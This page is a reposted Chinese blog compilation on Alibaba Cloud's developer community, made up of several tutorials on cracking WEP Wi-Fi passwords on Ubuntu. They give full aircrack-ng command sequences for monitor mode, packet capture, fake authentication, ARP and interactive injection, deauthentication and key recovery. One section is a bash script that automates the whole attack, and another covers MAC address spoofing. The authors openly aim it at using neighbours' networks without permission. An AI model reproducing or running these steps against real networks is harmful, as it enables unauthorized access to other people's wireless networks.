开发者社区> 老朱教授> 正文
阿里云
为了无法计算的价值
打开APP
阿里云APP内打开

用Ubuntu破解wep无线加密

简介:
+关注继续查看

用Ubuntu破解wep无线加密2009-09-29 09:50一、安装ubuntu和aircrack-ng
先安装 Ubuntu最新版,更新系统到最新
终端中输入 sudo apt-get install aircrack-ng 安装aircrack-ng
没联网的话 到别的电脑上网下载aircrack-ng Ubuntu DEB安装包 安装

二、破解过程
1、启动无线网卡的监控模式,在终端中输入:sudo airmon-ng start wlan0
(wlan0是无线网卡的端口,可在终端中输入 ifconfig 查看)

2、查看无线AP在终端中输入:
sudo airodump-ng mon0
(特别说明:启动监控模式后无线网的端口现在是 mon0 !!!)
看看有哪些采用wep加密的AP在线,然后按 ctrl+c 退出,保留终端

3、抓包
另开一个终端,输入:
sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0
(-c 后面跟着的6是要破解的AP工作频道,--bissid后面跟着的AP's MAC是要欲破解AP的MAC地址,-w后面跟着wep的是抓下来的数据包DATA保存的文件名,具体情况根据步骤2里面的在线AP更改频道和MAC地 址,DATA保存的文件名可随便命名)

4、与AP建立虚拟连接
再另开一个终端,输入:
sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0
(-h后面跟着的My MAC是自己的无线网卡的MAC地址)

5、进行注入
成功建立虚拟连接后输入:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0
现在回头看下步骤3的终端是不是DATA在开始飞涨!

6、解密
收集有5000个以上的DATA之后,另开一个终端,输入:
sudo aircrack-ng wep*.cap
进行解密
(如果没算出来的话,继续等,aircrack-ng 会在DATA每增加多5000个之后就自动再运行,直到算出密码为至)

7、收工
破 解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的。 现在可以冲浪去了,或者重复步聚1-7破解其它的AP 呵呵兄弟们冲浪时可别太猛了,不然把主人给冲翻了可就不好。


///////////////////////////////////////////////////
用Ubuntu破解WEP密钥

  看了这篇文章,任何人都可以安装和运行Linux,并破解WEP密钥。我一共花了整整两天,并阅读了大量资料才做出这个东西,现在拿出来和大家分享。

  看了这篇文章,任何人都可以安装和运行Linux,并破解WEP密钥。我一共花了整整两天,并阅读了大量资料才做出 这个东西,现在拿出来和大家分享。我不是Linux方面的专家。你所需要的就是一个有无线网卡的旧笔记本和一份Ubuntu Linux的拷贝,这是目前最流行并且最易于安装的Linux发行版本之一。

  第一步,很显然,是安装Ubuntu。从CD启动,按指示操作,非常简单。要注意的是,接下来的每一步都要有序进行,否则就达不到预期目标。

  下一步是安装其它程序。首先要保证你的本本可以联网。安装其它程序,需要打开一个终端窗口,并键入如下代码:


sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup

  sudo gedit /etc/apt/sources.list

  在编辑器中,用以下代码代替其它东西:


## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.

  deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

  deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

  ## MAJOR BUG FIX UPDATES produced after the final release

  deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

  deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

  ## UBUNTU SECURITY UPDATES

  deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

  deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

  ## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)

  deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

  deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

  ## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)

  deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free

  deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free

    保存文件、退出编辑器。敲入如下命令:


sudo apt-get update

    现在我们可以安装后续将会用到的包了:


sudo apt-get install build-essential

  sudo apt-get install aircrack

  sudo apt-get install kismet

  sudo apt-get install airsnort

  sudo apt-get install linux-source

  sudo apt-get install linux-headers

  sudo apt-get install sharutils

  接下来你应该更新整个系统,方法是,进入系统菜单——>Administration——>Update Manager。单击“Check”,开始安装更新。然后重启系统。完成后,为Madwifi驱动打补丁。

  这个地方可能会有点复杂。我的无线网卡(Linksys WPC55AG)用的是Atheros驱动,我需要对之打补丁。如果你的驱动和我的不同,你需要研究一下是否需要为驱动打补丁,是否甚至可以和 Aircrack套件协同工作。Aircrack-ng.org的论坛是一个用来测试的好地方,当然了,google search也是的。如果你的网卡也是Atheros的,我们称之为ath0,那么,在终端窗口敲入iwconfig,会出现一行字符,显示以太网控制器 是Atheros Communications……

  我们来打补丁。当发现硬盘旧的驱动时,会暂时让你的无线网卡无法工作。先进入/usr/src目录,下载新的驱动、删掉老驱动,然后安装新驱动,并打上补丁。你可以把以下代码拷贝粘贴到终端:


sudo -i
cd /usr/src

  wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz

  wget http://syserr.com/stuff/madwifi-cvs-20051025.patch

  ifconfig ath0 down

  rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal

  find /lib/modules -name ‘ath*’ -exec rm -v {} \;

  find /lib/modules -name ‘wlan*’ -exec rm -v {} \;

  tar zxvf madwifi-cvs-20051025.tar.gz

  cd madwifi

  patch -Np1 -i ../madwifi-cvs-20051025.patch

  make && make install

  modprobe ath_pci

   如果你用的是Atheros驱动,接下来我们旧需要配置kismet了。如果你用的是其它驱动,就必须看你所使用的语法。首先进入Kismet配置,然后改变源代码行。


sudo gedit /etc/kismet/kismet.conf

  把以“source=”打头的代码行变为“source=madwifi_ag,ath0,madwifi”,重启计算机。重启后你将可以通过无线网卡访问英特网。

  现在我们开始破解。打开一个终端窗口,进入监控模式,运行ksimet。


sudo airmon start ath0

  sudo kismet

  找到你想要破解的无线网络,需要注意其ESSID和通道,然后敲Ctrl-C退出。

  接下来运行airodump。


sudo airodump ath0 filename channel# 1

  文件名随你意,可以作为ivs文件存在你的home目录下,或者存在你运行命令的任何目录下。

  从airodump中拷贝无线网络的bssid,具体做法是选中后敲Shift+Ctrl+C。打开一个新的终端窗口,以便我们可以运行 aireplay,开始注入数据包,导致数据量上升。我们想要airodump中的数据栏显示在10万到40万之间。数据包越多,aircrack就可以 越快地找到WEP密钥。如果WEP密钥是128位的,我们可能需要多达100万个数据包。


sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

  应该把网络和无线连接联系起来。如果总是超时,你需要离无线路由器更近,或通过“sudo iwconfig ath0 rate 1M”改变接口速率。

  接下来我们想开始注入数据包。


sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

  起初只是读取数据包,并且报告0个ARP请求、发送0个数据包。只需要等一两分钟,就会开始大量发送数据包了。如果返回文本,并报告说已经被削弱了,那么敲Ctrl+C,重新运行命令。可以通过敲入下面这条命令来加速任何事情:


sudo aireplay -0 ath0 -a BSSID ath0

  否则就只坐等事情慢慢进行吧。随着数据包开始被发送,Airodump中的数据栏就开始飙升。等到收到了预期数量的数据包,打开一个新的终端窗口,运行aircrack。


sudo aircrack filename.ivs

  一分钟后,aircrack应该返回WEP密钥。如果没有返回,那就继续回收更多的数据包。

  这做起来一点都不费劲,但可以起作用。

ubuntu下wep密码破解脚本

#!/bin/bash
#ubuntu下WEP密码破解 version 2.0
MY_MAC=$(set $(ifconfig|grep "wlan0") && echo $5)
AP_MAC=ff:ff:ff:ff:ff:ff
yn=y
##准备区
if [ ! -f /usr/sbin/airmon-ng ] ;then
sudo apt-get install aircrack-ng
fi
##破解区
while [ "$yn" == "y" ]
do
echo "启动无线网卡的监控模式"
sudo airmon-ng start wlan0
read -p "查看可用AP,等会好了就按ctrl+c,先回车吧" tmp
sudo airodump-ng mon0
trap "echo 继续" INT
read -p "欲破解AP的MAC地址:" AP_MAC
read -p "使用的频道(默认6):" tmp
CHANNEL=${tmp:-6}
read -p "临时文件名(默认wep):" tmp
FILE=${tmp:-wep}
gnome-terminal -e "sudo airodump-ng -c "$CHANNEL" --bssid "$AP_MAC" -w "$FILE" mon0"
echo "与AP建立虚拟连接"
sudo aireplay-ng -1 0 -a "$AP_MAC" -h "$MY_MAC" mon0
echo "进行注入"
gnome-terminal -e "sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b "$AP_MAC" -h "$MY_MAC" mon0"
read -p "请在DATA达到5000后按回车开始破解" tmp
sudo aircrack-ng "$FILE"*.cap
echo "清理战场"
rm "$FILE"*
read -p "继续不?" tmp
case tmp in
[yY]|[yY][eE][sS]) yn=y;;
[nN]*) yn=n;;
*) exit 0;;
esac
done
sudo airmon-ng stop mon0


ubuntu下破解wep无线密码 2009-11-07 02:38 (分类:linux)
这个事情本来就是个走在道德边缘的事儿,所以我就无耻的说站在研究学习的角度上大家研究研究吧。。。。


一、软硬件环境


1.最起码你得有个带无线网卡的本本或者台式机吧?

2.RT,你得装上和我一样的ubuntu系统吧?你没装或者不打算装的话就别往下看了。

3.通过新立得软件管理器或者通过apt-get install 来安装aircrack-ng这个软件包(会提示你一并安装iw这个包)。

二、破解过程:

1.开第一个shell窗口,输入ifconfig -a 看到你的无线网卡,显示为wlan0,将mac地址复制粘贴到一个文档中,后面要用到。

2.启用无线网卡。输入ifconfig wlan0 up

再输入airmon-ng start wlan0 11 开启信道6的监听,或者输入airmon-ng start wlan0开启所有信道的监听。当然如果你要破解的无线再信道n上,将6替换成对应的数值n就可以了。

3.输入airodump-ng --ivs -w name -c 11 mon0 截取数据包。name是截取的包生成文件的名字,可以随便起,我们以name为例;11是信道,同样是替换成你要破解无线所在信道对应的数值。回车确认 后,在出现的shell里找到你要破解无线对应的BSSID,也就是AP的MAC,也复制或者记录到文档里,后面要用到。

7.建立虚拟连接:开第二个shell窗口,输入aireplay-ng -1 0 -a <目标AP MAC> -h <自己的瑞银MAC> mon0,当出现笑脸后连接成功。刚才复制的mac用上了吧?呵呵!
(这步很关键,不行的话就多试几次,输入iwconfig mon0 rate 2M 降低传输速度对建立连接有帮助)

8.aireplay-ng -2 -p 0841 -c ffffffffffff -b <目标AP MAC> -h <自己的无线网卡MAC> mon0 进行交互式攻击。如成功输入Y确认

9.耐心等待第一个shell窗口的data的数字增加到1.5万以上。如果信号好的话很快,信号一般的话可以去看电视了。。。

10.开第三个shell窗口,输入aircrack-ng -n 64 -b <目标AP MAC> name*.ivs 。这里的64是指你破解的无线密码是64位加密的,如果没有破解成功,则改成128位再试,应该没有问题!

11.如果顺利,马上就能得到Key了。

最后,希望在蹭或者将要蹭别人无线用的朋友能有一点公德心,收发下email、上个QQ、再顶多上个网页就可以了,不要看在线视频、下载东西,不要影响无线主人的正常使用,人家是花了银子的!


Ubuntu下无客户端无线WEP加密破解实战讲解2008-04-24 13:31在图形界面中,打开一个Shell,如下图,输入ifconfig -a 察看当前网卡

这里我就使用USB网卡为例,可以看到有一个名为rausb0的网卡,状态是未载入,这里先不要载入,先将MAC地址修改成需伪造的任意MAC地址,

输入macchanger –m 00:11:22:33:44:55 rausb0

-m后跟要伪造的MAC,之后再跟要修改的网卡名即可,这里我们将该USB网卡MAC修改成00:11:22:33:44:55
然后再载入网卡,输入:

ifconfig -a rausb0 up来载入USB网卡驱动
下来,我们可以使用如Kismet、Airosnort等工具来扫描当前无线网络的AP,

然后,我们需要将网卡激活成monitor模式,才可以进行后续的破解,命令如下:

airmon-ng start rausb0 3,这里这个3就是我们发现的AP的频道,然后输入下列命令开始抓包
airodump-ng -w test.cap --channel 3 rausb0 ,这里test.cap就是我设置的抓包文件名

下来,就可以进行FakeAuth攻击,这种攻击就是专门在预攻击无线接入点AP没有客户端活动甚至不存在Client的情况下使用的。具体命令如下:
aireplay-ng -1 1 -e AP’s ESSID -a AP’s MAC -h FakeMAC rausb0
这里-1指的就是采用FakeAuth攻击模式,后面跟延迟;-e后面跟AP的ESSID,-a后面设置AP的MAC,-h后面则是前面伪造的MAC,最后是无线网卡。

与此同时,为了IVs(初始化向量)的获取,必须进行ArpRequest注入式攻击,这个很重要,可以有效提高抓包数量及破解速度,命令如下
aireplay-ng -3 -b AP's MAC -h Client's MAC -x 1024 rausb0
解释一下:-3指的是采取ArpRequest注入攻击方式,-b后面跟上要入侵的AP的MAC地址,-h后面跟的是监测到的客户端MAC地址,这里我们使用刚才伪造的客户端MAC,如上图中显示的,至于-x 1024指的是定义每秒发送数据包数量,这个值可以小一些,但最高1024就可以了,这里我使用默认,最后是指定USB无线网卡接下来,就可以同步开启aircrack-ng来进行同步破解了,命令如下:

aircrack-ng -x -f 2 test-01.cap这里-x是暴力破解模式,-f指的是启用密码复杂度为2 ,后面是我们即时保存的那个抓包文件,




本文转自suifei博客园博客,原文链接:http://www.cnblogs.com/Chinasf/archive/2010/05/07/1729455.html,如需转载请自行联系原作者

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
ubuntu14.04源无法更新--jdk安装出错解决方法
今天真是背。。。安装了一晚上的源都安装不成功,一直提示校验和有问题。 于是问了其他大神,很多人提供了方法,但都没什么用,后来用以下这种方法解决了问题,因为update不成功导致后面java jdk7安装不成功。
1156 0
Ubuntu 入门(2):配置 Java 环境变量 及 设置默认JDK
版权声明:转载请联系本人,感谢配合!本站地址:http://blog.csdn.net/nomasp https://blog.csdn.net/NoMasp/article/details/51584414 下载 官网的下载地址:Java SE Development Kit 8 Downloads 认准自己所需的版本后开始下载就好了,本文后面以“jdk-8u91-linux-x64.tar.gz”为例。
717 0
ubuntu安装离线JDK
<h3>1、首先上Oracle官网下载JDK</h3> <p><a target="_blank" href="http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html">http://www.oracle.com/technetwork/java/javase/download
1222 0
ubuntu11.04更改默认JDK
第一步,安装Sun的JDK: sudo apt-get install sun-java6-jre sudo apt-get install sun-java6-jdk 此时,在命令行里面输入java -version,显示的JDK仍然是OpenJDK,所以需要修改默认的JDK   第二步...
619 0
Ubuntu下用docker安装redis镜像和使用redis容器分享
Ubuntu下用docker安装redis镜像和使用redis容器分享   1. 安装Ubuntu 2. 用Putty登录Ubuntu Welcome to Ubuntu 14.
1340 0
+关注
文章
问答
文章排行榜
最热
最新
相关电子书
更多
低代码开发师(初级)实战教程
立即下载
阿里巴巴DevOps 最佳实践手册
立即下载
冬季实战营第三期:MySQL数据库进阶实战
立即下载